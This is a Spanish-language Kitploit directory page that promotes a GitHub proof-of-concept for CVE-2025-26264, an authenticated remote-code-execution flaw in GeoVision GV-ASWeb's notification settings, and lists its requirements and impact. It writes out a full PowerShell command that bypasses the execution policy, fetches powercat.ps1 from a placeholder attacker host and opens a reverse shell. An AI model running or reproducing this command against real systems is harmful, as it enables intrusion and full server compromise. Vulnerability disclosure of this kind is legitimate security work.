Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/hxlxmj/cve-2025-26264
Análisis de VulnerabilidadesExplotaciónMovimiento LateralExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubhxlxmj/cve-2025-26264

CVE-2025-26264

Ver Repositorio
Sitio web
15hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

CVE-2025-26264 - GeoVision GV-ASWeb con la versión 6.1.2.0 o inferior, contiene una vulnerabilidad de ejecución remota de código (RCE) dentro de su función de configuración de notificaciones. Un atacante autenticado con privilegios de "Configuración del sistema" en ASWeb puede explotar esta falla para ejecutar comandos arbitrarios en el servidor, lo que lleva a un compromiso total del sistema.

Compartir

CVE-2025-26264

CVE-2025-26264 - GeoVision GV-ASWeb con la versión 6.1.2.0 o inferior, contiene una vulnerabilidad de Ejecución Remota de Código (RCE) dentro de su función de Configuración de Notificaciones. Un atacante autenticado con privilegios de "Configuración del Sistema" en ASWeb puede explotar esta falla para ejecutar comandos arbitrarios en el servidor, lo que conduce a un compromiso total del sistema.

Requisitos

Para realizar un ataque exitoso, un atacante requiere:

  • Acceso de red a la aplicación web GV-ASManager con la versión 6.1.2.0 o inferior;
  • Acceso a una cuenta con privilegio de gestionar la función Configuración de Notificaciones.

Impacto

La vulnerabilidad puede ser aprovechada para realizar las siguientes acciones no autorizadas:

  • Una cuenta con privilegio de gestionar la función Configuración de Notificaciones es capaz de:
    • Realizar un ataque de Ejecución Remota de Código.
  • Después del ataque exitoso, un atacante podrá:
    • Acceder, modificar o eliminar información sensible del sistema;
    • Plantar una puerta trasera en el sistema;
    • Realizar un ataque de ransomware;
    • Realizar movimiento lateral en la red interna.

CVE-2025-26264 PoC [Probando GeoVision v6.1.2.0]

Explotar la vulnerabilidad de Ejecución Remota de Código en la plataforma ASWeb de GeoVision GV-ASManager es posible contra las versiones 6.1.2.0 o inferiores (no hay corrección disponible al 26 de febrero de 2025).

La función Configuración de Notificaciones de ASWeb de GeoVision ASManager es vulnerable a RCE

Solicitud HTTP para configurar una notificación en un evento específico: Intento de inicio de sesión fallido en TAWeb

Según este script, si hay un intento de inicio de sesión fallido en TAWeb, se ejecutará el siguiente script de PowerShell:

powershell.exe Set-ExecutionPolicy Bypass -Force;IEX(New-Object System.Net.WebClient).DownloadString('http://LHOST/powercat.ps1');powercat -c LHOST -p LPORT -e powershell

Un intento de autenticación fallido en TAWeb

Host de la víctima: El script abre una puerta trasera al host del atacante.

Host del atacante: Un atacante obtiene la shell

Contacto

Si tienes alguna pregunta, puedes contactarme, Giorgi Dograshvili en LinkedIn.

Descargar herramienta